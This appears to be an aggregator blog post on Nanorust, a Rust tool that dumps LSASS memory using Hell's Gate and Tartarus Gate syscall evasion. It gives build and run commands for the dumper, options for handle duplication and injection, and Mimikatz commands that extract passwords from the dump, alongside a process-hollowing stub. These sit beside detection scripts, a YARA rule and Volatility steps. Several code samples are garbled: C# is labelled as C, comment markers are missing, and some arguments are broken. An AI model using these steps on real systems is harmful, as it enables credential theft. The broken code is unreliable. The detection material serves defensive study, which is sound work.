Listen to this Post

Introduction:
The eternal cat-and-mouse game between red team operators and endpoint detection has just escalated with Nanorust—a Rust-based rewrite of the infamous Nanodump tool that specifically targets LSASS processes where Windows credentials live. By leveraging advanced syscall obfuscation techniques including Hell’s Gate and Tartarus Gate, this tool represents a significant evolution in how attackers can bypass security monitoring to extract sensitive authentication data directly from memory.
Learning Objectives:
- Understand how Nanorust implements Hell’s Gate and Tartarus Gate syscall techniques to evade EDR hooks
- Master the handle duplication method for accessing LSASS without direct process opening
- Deploy and configure Nanorust in controlled red team environments for credential harvesting exercises
- Identify detection signatures and implement mitigation strategies against such memory dumping attacks
You Should Know:
1. Building and Deploying Nanorust on Windows Targets
Nanorust requires Rust 1.88+ and specifically targets x64 Windows systems. The build process is straightforward but requires proper environment setup:
Install Rust if not already present (PowerShell as administrator) winget install Rustlang.Rustup Verify installation rustc --version cargo --version Clone the Nanorust repository git clone https://github.com/Hakumarachi/Nanorust.git cd Nanorust Build the release version with optimizations cargo build --release The compiled binary will be at .\target\release\nanorust.exe
What this does: Compiles the Nanorust memory dumping tool with full optimizations, creating a standalone executable that implements all evasion techniques.
- Hell’s Gate and Tartarus Gate: Syscall Evasion Explained
Nanorust implements Hell’s Gate, a technique that dynamically resolves syscall numbers from ntdll.dll at runtime, bypassing hooked functions. Here’s how to verify this behavior:
Monitor syscalls being used (requires Sysmon with appropriate config)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
Where-Object { $_.Message -match "NtReadVirtualMemory|NtOpenProcess" } |
Select-Object TimeCreated, Message -First 10
Check if Nanorust is bypassing user-mode hooks using API Monitor
Download API Monitor from http://www.rohitab.com/apimonitor
Attach to nanorust.exe process and filter for syscalls
The Tartarus Gate enhancement extends Hell’s Gate by adding indirect syscall invocation, making detection even more challenging.
3. Handle Duplication Technique for LSASS Access
One of Nanorust’s stealthiest features is handle duplication—instead of directly opening LSASS (which triggers alerts), it duplicates an existing handle:
// Conceptual C code showing handle duplication (for educational purposes)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
class HandleDuplicationDemo
{
[DllImport("ntdll.dll", SetLastError = true)]
static extern int NtOpenProcess(ref IntPtr ProcessHandle, uint AccessMask,
ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId);
[DllImport("ntdll.dll", SetLastError = true)]
static extern int NtDuplicateObject(IntPtr SourceProcessHandle,
IntPtr SourceHandle, IntPtr TargetProcessHandle, out IntPtr TargetHandle,
uint DesiredAccess, uint HandleAttributes, uint Options);
// Find a process with a handle to LSASS and duplicate it
static void DuplicateLsassHandle()
{
// Implementation would enumerate process handles and duplicate
// those pointing to LSASS process ID
}
}
4. Executing Nanorust for Credential Extraction
Once compiled, executing Nanorust requires understanding its command-line options:
Basic execution (dumps LSASS to default location) .\nanorust.exe Specify custom output file .\nanorust.exe -o C:\temp\lsass.dmp Use handle duplication method specifically .\nanorust.exe --duplicate-handle Combine with process injection for added stealth .\nanorust.exe --inject --target-pid 1234 Verify successful dump dir C:\temp.dmp Analyze the dump with Mimikatz (on attacker machine) mimikatz sekurlsa::minidump lsass.dmp mimikatz sekurlsa::logonPasswords
5. Detecting and Mitigating Nanorust Attacks
Blue team members can implement these detection measures:
PowerShell detection script for LSASS access anomalies
$lsass = Get-Process lsass -ErrorAction SilentlyContinue
if ($lsass) {
$lsassId = $lsass.Id
Monitor for processes accessing LSASS
Get-WinEvent -FilterHashtable @{
LogName = 'Security'
ID = 4656, 4663 Handle access events
} | Where-Object { $_.Properties[bash].Value -eq $lsassId } |
Format-Table TimeCreated, Message -AutoSize
Check for suspicious process creation
Get-WinEvent -LogName 'Security' -FilterXPath
"[System[EventID=4688]]" |
Where-Object { $_.Properties[bash].Value -match 'nanorust|lsass' } |
Select-Object TimeCreated, Message
}
Enable PPL (Protected Process Light) for LSASS
Add registry key to enable LSA Protection
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
-Name "RunAsPPL" -Value 1 -PropertyType DWord -Force
Restart for changes to take effect
This prevents non-PPL processes from accessing LSASS
6. Linux Cross-Compilation for Windows Targets
Security researchers can cross-compile Nanorust from Linux:
Install cross-compilation target rustup target add x86_64-pc-windows-gnu Install MinGW for Windows linking sudo apt install mingw-w64 Cross-compile cargo build --release --target x86_64-pc-windows-gnu The Windows executable will be at: ./target/x86_64-pc-windows-gnu/release/nanorust.exe
7. Advanced Evasion: Combining with Process Hollowing
For red team exercises, Nanorust can be combined with process hollowing:
// Conceptual Rust code for process hollowing (simplified)
use windows::Win32::System::Diagnostics::Debug::;
use windows::Win32::System::Threading::;
use windows::Win32::Foundation::;
unsafe fn hollow_process(target_path: &str) -> Result<(), Box<dyn std::error::Error>> {
// 1. Create suspended process
// 2. Unmap original executable memory
// 3. Allocate memory and write Nanorust payload
// 4. Set entry point and resume thread
Ok(())
}
8. YARA Rules for Nanorust Detection
Create YARA rules to identify Nanorust binaries:
rule Nanorust_Memory_Dumper {
meta:
description = "Detects Nanorust LSASS memory dumper"
author = "Security Research"
date = "2024-01-15"
strings:
$s1 = "NtOpenProcess" wide ascii
$s2 = "NtReadVirtualMemory" wide ascii
$s3 = "Hell's Gate" wide ascii
$s4 = "Tartarus Gate" wide ascii
$s5 = "lsass.exe" wide ascii nocase
$s6 = "duplicate-handle" wide ascii
condition:
3 of ($s) or (all of ($s1,$s2,$s5))
}
9. Memory Forensics to Detect Past Attacks
Use Volatility 3 to identify LSASS dumping artifacts:
Install volatility3 git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 Analyze memory dump for LSASS access python vol.py -f memory.dump windows.cmdline.CmdLine Check for process handle leaks python vol.py -f memory.dump windows.handles.Handles --pid [bash] Look for suspicious memory sections python vol.py -f memory.dump windows.malfind.Malfind Verify if LSASS was accessed by non-system processes python vol.py -f memory.dump windows.pslist.PsList
What Undercode Say:
Key Takeaway 1: Nanorust represents a dangerous evolution in credential dumping tools by combining Rust’s performance with advanced syscall evasion techniques. Its implementation of Hell’s Gate and Tartarus Gate makes it significantly harder for traditional EDR solutions that rely on user-mode API hooking to detect malicious LSASS access.
Key Takeaway 2: The handle duplication technique is particularly concerning because it leverages legitimate process interactions—finding a process that already has a handle to LSASS and duplicating it bypasses the need to call NtOpenProcess directly, which is heavily monitored.
The shift to Rust for malware development is accelerating because it provides memory safety without garbage collection, produces smaller binaries, and offers better cross-platform capabilities. For blue teams, this means updating detection strategies to focus on abnormal memory access patterns rather than simple API call monitoring. Implementing LSA Protection (RunAsPPL), Credential Guard, and aggressive handle auditing are essential countermeasures. Organizations should also deploy Sysmon with comprehensive rule sets that flag any process attempting to read LSASS memory, regardless of how the handle was obtained. The arms race continues, and tools like Nanorust ensure that security professionals must constantly evolve their defensive strategies.
Prediction:
Within the next 6-12 months, we’ll see mainstream EDR vendors releasing signature updates specifically targeting Nanorust’s syscall patterns, followed by the emergence of Rust-based offensive toolkits that combine multiple evasion techniques (Hell’s Gate, Tartarus Gate, and Halos Gate) into unified frameworks. Simultaneously, Microsoft will likely enhance LSASS protections in Windows 12 or through cumulative updates, possibly requiring TPM-backed isolation for LSA processes. This will push attackers toward alternative credential access methods, including memory scraping of other processes and cloud authentication token theft.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Splog Nanorust – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


